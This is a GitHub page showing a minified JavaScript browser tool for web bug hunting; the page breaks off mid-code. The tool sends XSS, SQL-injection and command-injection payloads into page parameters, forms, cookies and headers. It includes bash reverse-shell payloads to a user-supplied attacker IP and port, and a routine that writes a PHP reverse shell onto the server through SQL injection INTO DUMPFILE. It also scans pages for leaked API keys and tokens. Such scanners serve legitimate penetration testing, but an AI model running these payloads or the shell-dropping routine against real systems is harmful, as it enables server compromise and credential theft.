-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathjsBugHuntingHelper.min.js
More file actions
executable file
·1 lines (1 loc) · 43.7 KB
/
jsBugHuntingHelper.min.js
File metadata and controls
executable file
·1 lines (1 loc) · 43.7 KB
1
function JsBugHuntingHelper(){"use strict";this.xssScanEnabled=!1,this.sqlInjectionScanEnabled=!1,this.rceScanEnabled=!1,this.formFuzzingEnabled=!1,this.originalWinObj={},this.attackerIp="",this.attackerPort="",this.customCookie="",this.customHeaders="",this.cookiesFuzzerEnabled=!1,this.headersFuzzerEnabled=!1;const previousXssAction="null",payloadsXSS=[{type:"XSS",previousAction:"null",payloadString:'<script>alert("XSS_VULNERABLE_PARAM")<\/script>',expectedResult:"data.indexOf('<script>alert(\"XSS_VULNERABLE_PARAM\")<\/script>') !== -1 && data.indexOf('Uncaught mysqli') === -1"},{type:"XSS",previousAction:"null",payloadString:'"><script>alert("XSS_VULNERABLE_PARAM")<\/script><div class="',expectedResult:"data.indexOf('<script>alert(\"XSS_VULNERABLE_PARAM\")<\/script>') !== -1 && data.indexOf('Uncaught mysqli') === -1"},{type:"XSS",previousAction:"null",payloadString:'<svg/onload=alert("XSS_VULNERABLE_PARAM")>',expectedResult:"data.indexOf('<svg/onload=alert(\"XSS_VULNERABLE_PARAM\")>') !== -1 && data.indexOf('Uncaught mysqli') === -1"}],previousErrorBasedSqliAction="null",errorBasedSqliResult="data.indexOf('Uncaught mysql') !== -1",payloadsSQLi=[{type:"SQL Injection",previousAction:"null",payloadString:'"',expectedResult:errorBasedSqliResult},{type:"SQL Injection",previousAction:"null",payloadString:"'",expectedResult:errorBasedSqliResult},{type:"SQL Injection",previousAction:"null",payloadString:"concat(9182,73645)",expectedResult:"data.indexOf('918273645') !== -1"}],unionSelectSQLiResult="data.indexOf('918273645') !== -1 && data.indexOf('union select') === -1",eof=["","--","#"],sqliQuery=[];sqliQuery[0]={originalQuery:"' union select '918273645",addend:"','918273645",finalQuote:["","'"]},sqliQuery[1]={originalQuery:'" union select "918273645',addend:'","918273645',finalQuote:["",'"']},sqliQuery[2]={originalQuery:"0 union select 918273645",addend:",918273645",finalQuote:[""]};for(let q=0;q<sqliQuery.length;q++){let payload=sqliQuery[q].originalQuery;for(let i=0;i<11;i++){i>0&&(payload+=sqliQuery[q].addend);for(let fq=0;fq<sqliQuery[q].finalQuote.length;fq++){const payloadWithQuotes=payload+sqliQuery[q].finalQuote[fq];for(let e=0;e<eof.length;e++){const payloadWithQuotesEof=payloadWithQuotes+eof[e];payloadsSQLi.push({type:"SQL Injection",previousAction:"null",payloadString:payloadWithQuotesEof,expectedResult:unionSelectSQLiResult})}}}}const previousRceAction="data = data.replaceAll('echo%2BTEST_RCE','').replaceAll('echo+TEST_RCE','').replaceAll('echo TEST_RCE','').replaceAll('testRCE.php','').replaceAll(\"'TEST_RCE'\",'')",genericRceResult="data.indexOf('TEST_RCE') !== -1 && data.indexOf('Uncaught mysqli') === -1",payloadsRCE=[{type:"RCE",previousAction:previousRceAction,payloadString:'test" || echo TEST_RCE > /var/www/html/testRCE.php && cat /var/www/html/testRCE.php || "',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'test" || echo TEST_RCE > /var/www/testRCE.php && cat /var/www/testRCE.php || "',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'"+%26%26+echo+TEST_RCE+%26%26+"',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'" && echo TEST_RCE && "',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:"echo TEST_RCE",expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'1" && echo TEST_RCE #',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'" || echo TEST_RCE ||',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:"1\" || /bin/bash -c 'bash -i >& /dev/tcp/[ATTACKERIP]/[ATTACKERPORT] 0>&1' #",expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'1" && echo ^<?php > file2.php && echo $cmd=^"bash.exe -c \\"bash.exe -i >& /dev/tcp/[ATTACKERIP]/[ATTACKERPORT] 0>&1\\"^"; >> file2.php && echo exec($cmd); >> file2.php && echo ?^> >> file2.php && php file2.php #',expectedResult:genericRceResult}],searchElements=[new SearchElement("form","string","<form"),new SearchElement("url","string","http://"),new SearchElement("url","string","https://"),new SearchElement("web socket","string","ws://"),new SearchElement("web socket","string","wss://"),new SearchElement("post request","string",'"POST"'),new SearchElement("get request","string",'"GET"'),new SearchElement("post request","string","'POST"),new SearchElement("get request","string","'GET'"),new SearchElement("ajax request","string",".ajax"),new SearchElement("post request","string","$.post"),new SearchElement("get request","string","$.get"),new SearchElement("query","string","query"),new SearchElement("api call","string","/api"),new SearchElement("php file","string",".php"),new SearchElement("asp file","string",".asp"),new SearchElement("json file","string",".json"),new SearchElement("mailto protocol","string","mailto:"),new SearchElement("something on mysql","string","mysql"),new SearchElement("something on email","string",'"email"'),new SearchElement("something on username","string",'"username"'),new SearchElement("something on username","string",'"user"'),new SearchElement("something on password","string",'"password"'),new SearchElement("something on password","string",'"pass"'),new SearchElement("something on password","string",'"psw"'),new SearchElement("something on password","string",'"pwd"'),new SearchElement("REGEX url with params","regEx",/\?(\w+=\w+)/),new SearchElement("REGEX email address","regEx",/\S+@\S+\.\S+/),new SearchElement("Twitter Access Token","regEx",/[1-9][ 0-9]+-[0-9a-zA-Z]{40}/),new SearchElement("Twitter Username","regEx",/(^|[^@\w])@(\w{1,15})\b/),new SearchElement("FB Access Token","regEx",/EAACEdEose0cBA[0-9A-Za-z]+/),new SearchElement("FB OAuth 2.0","regEx",/[A-Za-z0-9]{125}/),new SearchElement("Google API Key","regEx",/AIza[0-9A-Za-z-_]{35}/),new SearchElement("Google OAuth 2.0 Auth Code","regEx",/4\/[0-9A-Za-z-_]+/),new SearchElement("Google OAuth 2.0 Refresh Token","regEx",/1\/[0-9A-Za-z-]{43}|1\/[0-9A-Za-z-]{64}/),new SearchElement("Google OAuth 2.0 Access Token","regEx",/ya29.[0-9A-Za-z-_]+/),new SearchElement("Github OAuth 2.0 ID","regEx",/[A-Za-z0-9_]{255}/),new SearchElement("Picatic API Key","regEx",/sk_live_[0-9a-z]{32}/),new SearchElement("Stripe API Key","regEx",/sk_live_[0-9a-zA-Z]{24}/),new SearchElement("Square Access Token","regEx",/sqOatp-[0-9A-Za-z-_]{22}/),new SearchElement("Square OAuth Secret","regEx",/q0csp-[ 0-9A-Za-z-_]{43}/),new SearchElement("Paypal/Braintree Access Token","regEx",/\$[0-9a-z]{161[0-9a,]{32}/),new SearchElement("AWS Auth Token","regEx",/amzn.mws.[0-9a-f]{8}-[0-9a-f]{4}-10-9a-f1{4}-[0-9a,]{4}-[0-9a-f]{12}/),new SearchElement("Twilio API Key","regEx",/55[0-9a-fA-F]{32}/),new SearchElement("MailGun API Key","regEx",/key-[0-9a-zA-Z]{32}/),new SearchElement("MailChimp API Key","regEx",/[0-9a-f]{32}-us[0-9]{1,2}/),new SearchElement("Slack OAuth 2.0","regEx",/xoxb-[0-9]{11}-[0-9]{11}-[0-9a-zA-Z]{24}/),new SearchElement("Slack OAuth v2 Configuration Token","regEx",/xoxe.xoxp-1-[0-9a-zA-Z]{166}/),new SearchElement("Slack OAuth v2 Refresh Token","regEx",/xoxe-1-[0-9a-zA-Z]{147}/),new SearchElement("Slack Webhook","regEx",/T[a-zA-Z0-9_]{8}\/B[a-zA-Z0-9_]{8}\/[a-zA-Z0-9_]{24}/),new SearchElement("AWS Access Key ID","regEx",/AKIA[0-9A-Z]{16}/),new SearchElement("Google Cloud OAuth 2.0","regEx",/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/),new SearchElement("Google Clous API Key","regEx",/[A-Za-z0-9_]{21}--[A-Za-z0-9_]{8}/),new SearchElement("Heroku API Key","regEx",/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/),new SearchElement("Heroku OAuth 2.0","regEx",/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/),new SearchElement("Js One Line Comment","string","//"),new SearchElement("Js Multi Line Comment","string","/*")];function tryRemoteShellLink(v){return"SQL Injection"===v.payloadType&&-1!==v.paramValue.toLowerCase().indexOf("union")?"<a href=\"javascript:trySqliRemoteShell('"+btoa(JSON.stringify(v))+"')\">Try</a>":""}async function trySqliRemoteShell(base64v){const attackerIp=$("#attackerIp").val(),attackerPort=$("#attackerPort").val();if(""===attackerIp||""===attackerPort)return alert("Please insert your attacker ip and port"),!1;const fileName=(new Date).getTime()+".php",payloads=[{filePlace:"c:/var/www/"+fileName,payload:'<?php exec("bash.exe -c \\"bash.exe -i >& /dev/tcp/'+attackerIp+"/"+attackerPort+' 0>&1\\"");?>'},{filePlace:"/var/www/"+fileName,payload:"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+attackerIp+"/"+attackerPort+" 0>&1'\");?>"},{filePlace:"/var/www/html/"+fileName,payload:"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+attackerIp+"/"+attackerPort+" 0>&1'\");?>"}];alert("Run netcat -lvnp PORT (or ncat -lvnp PORT in windows) on your computer");const initialPayload=JSON.parse(atob(base64v));for(const pl of payloads){const stringPayload=pl.payload,hexPayload=stringPayload.hexEncode();let newPayload="";-1!==initialPayload.paramValue.indexOf('"918273645"')?newPayload=initialPayload.paramValue.replaceLast('"918273645',"0x"+hexPayload+" INTO DUMPFILE '"+pl.filePlace+"' #"):-1!==initialPayload.paramValue.indexOf("'918273645'")?newPayload=initialPayload.paramValue.replaceLast("'918273645","0x"+hexPayload+" INTO DUMPFILE '"+pl.filePlace+"' #"):-1!==initialPayload.paramValue.indexOf("918273645")&&(newPayload=initialPayload.paramValue.replaceLast("918273645","0x"+hexPayload+" INTO DUMPFILE '"+pl.filePlace+"' #")),console.log("initialPayload",newPayload);const name=initialPayload.paramName,value=newPayload;let tempParams=[];$("form").each((i,form)=>{$(form).find("input,button,select,textarea").each((i2,v2)=>{if(void 0!==$(v2).attr("name")&&"undefined"!==$(v2).attr("name")&&""!==$(v2).attr("name")){const tagName=$(v2)[0].tagName;let value="";if("SELECT"===tagName)value=$(v2).find("option:selected").val();else if("INPUT"===tagName){const type=$(v2).attr("type").toLowerCase();value="checkbox"===type||"radio"===type?$(v2).prop("checked").toString():$(v2).val()}tempParams.push([$(v2).attr("name"),value])}})}),tempParams=tempParams.filter((v,i)=>v[0]!==name),tempParams.push([name,value]),await $.ajax(initialPayload.url,{type:initialPayload.httpMethod,data:Object.fromEntries(tempParams)}).done(data=>{$.get(window.location.origin+"/"+fileName).done(()=>{})})}}function cookieToTouple(){return document.cookie.split(";").map(v=>v.split("="))}function headersToTouple(headers){let headersObj={};try{headersObj=JSON.parse(headers)}catch(e){console.log(e)}return Object.entries(headersObj)}function guiEnabled(gui){$("#guiModal #accordionExample").html(gui),document.getElementById("openGuiButton").disabled=!1,document.getElementById("openGuiButton").innerHTML="OPEN GUI"}function htmlEntities(str){return String(str).replace(/&/g,"&").replace(/</g,"<").replace(/>/g,">").replace(/"/g,""")}function getAllUrlParams(url){let queryString=url?url.split("?")[1]:window.location.search.slice(1);const obj={};if(queryString){queryString=queryString.split("#")[0];const arr=queryString.split("&");for(let i=0;i<arr.length;i++){const a=arr[i].split("="),paramName=a[0],paramValue=void 0===a[1]||a[1];if(paramName.match(/\[(\d+)?\]$/)){const key=paramName.replace(/\[(\d+)?\]/,"");if(obj[key]||(obj[key]=[]),paramName.match(/\[\d+\]$/)){const index=/\[(\d+)\]/.exec(paramName)[1];obj[key][index]=paramValue}else obj[key].push(paramValue)}else obj[paramName]?obj[paramName]&&"string"==typeof obj[paramName]?(obj[paramName]=[obj[paramName]],obj[paramName].push(paramValue)):obj[paramName].push(paramValue):obj[paramName]=paramValue}}return obj}function getjQueryEventHandlers(element,eventns){const $=this.originalWinObj.jQuery,i=(eventns||"").indexOf("."),event=i>-1?eventns.substr(0,i):eventns,namespace=i>-1?eventns.substr(i+1):void 0,handlers=Object.create(null);if(!(element=$(element)).length)return handlers;const listeners=$._data(element.get(0),"events")||handlers,events=event?[event]:Object.keys(listeners);if(!eventns)return listeners;function getHandlers(e){const type=this.toString(),eNamespace=e.namespace||e.data&&e.data.handler;(event===type&&!namespace||eNamespace===namespace&&!event||eNamespace===namespace&&event===type)&&(handlers[type]=handlers[type]||[],handlers[type].push(e))}return events.forEach(type=>{(listeners[type]||[]).forEach(getHandlers,type)}),handlers}function searchJqueryListeners(){const jQueryListeners=[];return $("*").each((i,v)=>{const elementListeners=getjQueryEventHandlers.call(this,v);Object.keys(elementListeners).length>0&&jQueryListeners.push(elementListeners)}),recursiveEnumerate(jQueryListeners,0)}function listAllEventListeners(){const allElements=Array.prototype.slice.call(document.querySelectorAll("*"));allElements.push(document),allElements.push(this.originalWinObj);const types=[];for(const ev in this.originalWinObj)/^on/.test(ev)&&(types[types.length]=ev);const elements=[];for(let i=0;i<allElements.length;i++){const currentElement=allElements[i];for(let j=0;j<types.length;j++)"function"==typeof currentElement[types[j]]&&elements.push(currentElement[types[j]])}return elements}function regEx(string,regEx){const index=[],regex1=RegExp(regEx,"gim"),str1=string;let array1=[];for(;null!==(array1=regex1.exec(str1));)index.push(array1.index);return index}function getAllIndexes(arr,val){const indexes=[];let i=-1;for(;-1!==(i=arr.indexOf(val,i+1));)indexes.push(i);return indexes}function searchInside(functionToString,object,objKeys,o,resultTmp){let result=[];if(void 0!==resultTmp&&(result=resultTmp),void 0===objKeys[o]&&(objKeys[o]=""),void 0===object[objKeys[o]]&&(object[objKeys[o]]=""),searchElements.forEach(v=>{if("string"===v.type){const index=getAllIndexes(functionToString,v.string);index.forEach(ind=>{result.push({description:v.description,name:objKeys[o],function:object[objKeys[o]],declaration:functionToString.substr(ind-15,60)})})}else if("regEx"===v.type){const index=regEx(functionToString,v.string);index.forEach(ind=>{"string"!==objKeys[o]&&result.push({description:v.description,name:objKeys[o],function:object[objKeys[o]],declaration:functionToString.substr(ind-15,60)})})}}),void 0===resultTmp)return result}function recursiveEnumerate(object,level){function recursion(object,level){level++;const objKeys=Object.keys(object);for(let o=0;o<objKeys.length;o++)if(level<5&&null!==object[objKeys[o]]&&("function"==typeof object[objKeys[o]]||"object"==typeof object[objKeys[o]])&&"$"!==objKeys[o]&&"location"!==objKeys[o]&&"jQuery"!==objKeys[o]&&"JsBugHuntingHelper"!==objKeys[o]&&"recursion"!==objKeys[o]&&"recursiveEnumerate"!==objKeys[o]&&"alreadyProcessedFunctions"!==objKeys[o]&&"jsHuntingHelper"!==objKeys[o]&&"fn"!==objKeys[o])try{const functionToString=object[objKeys[o]].toString().replace(/(\r\n|\n|\r)/gm,"").replace(/\s\s+/g," ");-1===alreadyProcessedFunctions.indexOf(functionToString)&&(searchInside(functionToString,object,objKeys,o,result),-1===functionToString.indexOf("[object Object]")&&alreadyProcessedFunctions.push(functionToString),"set"!==objKeys[o]&&"push"!==objKeys[o]&&recursion(object[objKeys[o]],level))}catch(reason){console.log(reason)}}const result=[],alreadyProcessedFunctions=[];return recursion(object,level),result}async function getPageHeaders(url){return new Promise((resolve,reject)=>{const xhr=$.ajax({type:"GET",url:url,success:function(){resolve(xhr.getAllResponseHeaders())},error:function(){resolve(!1)}})})}function removeBootstrapDuplicatedStyles(classToRemove){if(void 0!==document.wrappedJSObject)try{$.each(document.styleSheets,(function(_,sheet){let keepGoing=!0;return $.each(sheet.cssRules||sheet.rules,(function(index,rule){if(rule.selectorText===classToRemove)return sheet.deleteRule(index),keepGoing=!1,keepGoing})),keepGoing}))}catch(e){}}async function testCookies(){const result=[],paramsEntities=Object.entries(getAllUrlParams(document.location.href));for(const payload of payloadsXSS.concat(payloadsSQLi).concat(payloadsRCE))if(!0===this.xssScanEnabled&&"XSS"===payload.type||!0===this.sqlInjectionScanEnabled&&"SQL Injection"===payload.type||!0===this.rceScanEnabled&&"RCE"===payload.type){const url=document.location.origin+document.location.pathname,r=await new Payload(url,"cookiesParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,payload.type,headersToTouple(this.customHeaders),cookieToTouple()).isValidResponse();!1!==r&&result.push(r)}return result}async function testHeaders(){const result=[],paramsEntities=Object.entries(getAllUrlParams(document.location.href));for(const payload of payloadsXSS.concat(payloadsSQLi).concat(payloadsRCE))if(!0===this.xssScanEnabled&&"XSS"===payload.type||!0===this.sqlInjectionScanEnabled&&"SQL Injection"===payload.type||!0===this.rceScanEnabled&&"RCE"===payload.type){const url=document.location.origin+document.location.pathname,r=await new Payload(url,"headersParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,payload.type,headersToTouple(this.customHeaders),cookieToTouple()).isValidResponse();!1!==r&&result.push(r)}return result}async function testXSS(){const result=[],paramsEntitiesTemp=Object.entries(getAllUrlParams(document.location.href));for(let i=0;i<paramsEntitiesTemp.length;i++)for(const payload of payloadsXSS){const paramsEntities=Object.entries(getAllUrlParams(document.location.href)),newUrl2=document.location.origin+document.location.pathname,r=await new Payload(newUrl2,"pageParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,"XSS",headersToTouple(this.customHeaders),{}).isValidResponse();!1!==r&&result.push(r)}return result}async function testSqlInjection(){const result=[],paramsEntitiesTemp=Object.entries(getAllUrlParams(document.location.href));for(let i=0;i<paramsEntitiesTemp.length;i++)for(const payload of payloadsSQLi){const paramsEntities=Object.entries(getAllUrlParams(document.location.href)),newUrl2=document.location.origin+document.location.pathname,r=await new Payload(newUrl2,"pageParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,"SQL Injection",headersToTouple(this.customHeaders),{}).isValidResponse();!1!==r&&result.push(r)}return result}async function testRCE(){const result=[],paramsEntitiesTemp=Object.entries(getAllUrlParams(document.location.href));for(let i=0;i<paramsEntitiesTemp.length;i++)for(const payload of payloadsRCE){const paramsEntities=Object.entries(getAllUrlParams(document.location.href)),newUrl2=document.location.origin+document.location.pathname,r=await new Payload(newUrl2,"pageParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,"RCE",headersToTouple(this.customHeaders),{}).isValidResponse();!1!==r&&result.push(r)}return result}function Q(root,selector){return"string"==typeof root&&(selector=root,root=document),root.querySelectorAll(selector)}async function formLoop(){let result=[];for(const form of Q("form")){const originalParamsLength=$(form).find("input,button,select,textarea").length;let url=$(form).attr("action");if(void 0===url||""===url)url=this.originalWinObj.location.href;else if("http"!==url.substr(0,4)){let b=this.originalWinObj.location.href.split("/").slice(0,-1).join("/");"/"!==url[0]&&(b+="/"),url=b+url}let method="GET";"POST"!==$(form).attr("method")&&"post"!==$(form).attr("method")&&"$_POST"!==$(form).attr("method")&&"$_post"!==$(form).attr("method")||(method="POST");const tempParams=[];$(form).find("input,button,select,textarea").each((i2,v2)=>{if(void 0!==$(v2).attr("name")&&"undefined"!==$(v2).attr("name")&&""!==$(v2).attr("name")){const tagName=$(v2)[0].tagName;let value="";if("SELECT"===tagName)value=$(v2).find("option:selected").val();else if("INPUT"===tagName){const type=$(v2).attr("type").toLowerCase();value="checkbox"===type||"radio"===type?$(v2).prop("checked").toString():$(v2).val()}tempParams.push([$(v2).attr("name"),value])}});const paramsEntities=tempParams;result=result.concat(await fuzzer.call(this,originalParamsLength,url,"pageParams",method,paramsEntities)),!0===this.cookiesFuzzerEnabled&&(result=result.concat(await fuzzer.call(this,originalParamsLength,url,"cookiesParams",method,paramsEntities))),!0===this.headersFuzzerEnabled&&(result=result.concat(await fuzzer.call(this,originalParamsLength,url,"headersParams",method,paramsEntities)))}return result.filter(v=>void 0!==v.paramName)}async function fuzzer(originalParamsLength,url,type,method,paramsEntities){const result=[];for(let i=0;i<originalParamsLength;i++)for(const payload of payloadsXSS.concat(payloadsSQLi).concat(payloadsRCE))if(!0===this.xssScanEnabled&&"XSS"===payload.type||!0===this.sqlInjectionScanEnabled&&"SQL Injection"===payload.type||!0===this.rceScanEnabled&&"RCE"===payload.type){const r=await new Payload(url,type,method,paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,payload.type,headersToTouple(this.customHeaders),cookieToTouple()).isValidResponse();!1!==r&&result.push(r)}return result}this.init=async function(xssScanEnabled,sqlInjectionScanEnabled,rceScanEnabled,formFuzzingEnabled,attackerIp,attackerPort,customCookie,customHeaders,cookiesFuzzerEnabled,headersFuzzerEnabled){document.getElementById("openGuiButton").disabled=!0,document.getElementById("openGuiButton").innerHTML="Loading...",this.xssScanEnabled=xssScanEnabled,this.sqlInjectionScanEnabled=sqlInjectionScanEnabled,this.rceScanEnabled=rceScanEnabled,this.formFuzzingEnabled=formFuzzingEnabled,this.attackerIp=attackerIp,this.attackerPort=attackerPort,this.customHeaders="{}",this.cookiesFuzzerEnabled=cookiesFuzzerEnabled,this.headersFuzzerEnabled=headersFuzzerEnabled;try{""!==customHeaders.trim()&&(this.customHeaders=JSON.stringify(JSON.parse(customHeaders)))}catch(e){alert(e)}""!==customCookie.trim()&&(document.cookie=customCookie),void 0!==window.wrappedJSObject?this.originalWinObj=window.wrappedJSObject:this.originalWinObj=window,void 0!==window.wrappedJSObject&&(window.wrappedJSObject.Mapper=cloneInto(Mapper,window,{cloneFunctions:!0}),exportFunction(trySqliRemoteShell,window,{defineAs:"trySqliRemoteShell"})),removeBootstrapDuplicatedStyles(".fade"),removeBootstrapDuplicatedStyles(".collapse")},this.normalScan=async function(){let gui="",accordionNumber=0;if(console.log("Created by Davide Cavallini"),console.log("Linkedin: https://www.linkedin.com/in/davidecavallini/"),console.log("----------------------------------------------------------"),console.log("\n"),console.log("Body Source Suspicious Points".toUpperCase()),console.table(searchInside(document.body.innerHTML.replace(/(\r\n|\n|\r)/gm,"").replace(/\s\s+/g," "),document.body,["BODY"],0)),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Body Source Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Declaration</th></tr>",searchInside(document.body.innerHTML.replace(/(\r\n|\n|\r)/gm,"").replace(/\s\s+/g," "),document.body,["BODY"],0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),console.log("Window Memory Suspicious Points".toUpperCase()),recursiveEnumerate(this.originalWinObj,0).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Window Memory Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th><th>Mapper</th></tr>",recursiveEnumerate(this.originalWinObj,0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+'</td><td><a href="javascript:console.log('+v.name+");alert('Look the Console')\">"+htmlEntities(v.name)+"</a></td><td><code>"+htmlEntities(v.declaration)+"</code></td><td><a href=\"javascript:Mapper('"+v.name+"');alert('Look the Console')\">Reverse Map</a></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),console.log("JS Listeners Suspicious Points".toUpperCase()),recursiveEnumerate(listAllEventListeners.call(this),0).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">JS Listeners Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th></tr>",recursiveEnumerate(listAllEventListeners.call(this),0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td>"+htmlEntities(v.function.name)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),void 0!==window.wrappedJSObject.jQuery&&(console.log("JQuery Listeners Suspicious Points".toUpperCase()),searchJqueryListeners.call(this).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">JQuery Listeners Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th></tr>",searchJqueryListeners.call(this).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td>"+htmlEntities(v.function.name)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),console.log("JQuery Document Listeners Suspicious Points".toUpperCase()),recursiveEnumerate(getjQueryEventHandlers.call(this,document),0).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">JQuery Document Listeners Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th></tr>",recursiveEnumerate(getjQueryEventHandlers.call(this,document),0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td>"+htmlEntities(v.name)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")),console.log("Cookie".toUpperCase(),document.cookie),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Cookie</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">'+htmlEntities(document.cookie).replaceAll(";","<br>")+"</div></div></div>",!0===this.cookiesFuzzerEnabled){console.log("URL Cookies Vulnerabilities".toUpperCase());const cookies=await testCookies.call(this);console.log(cookies),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL Cookies Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",cookies.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"}console.log("----------------------------------------------------------------------------"),console.log("\n");const headers=await getPageHeaders(document.location.href);if(console.log("Headers".toUpperCase(),headers),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" 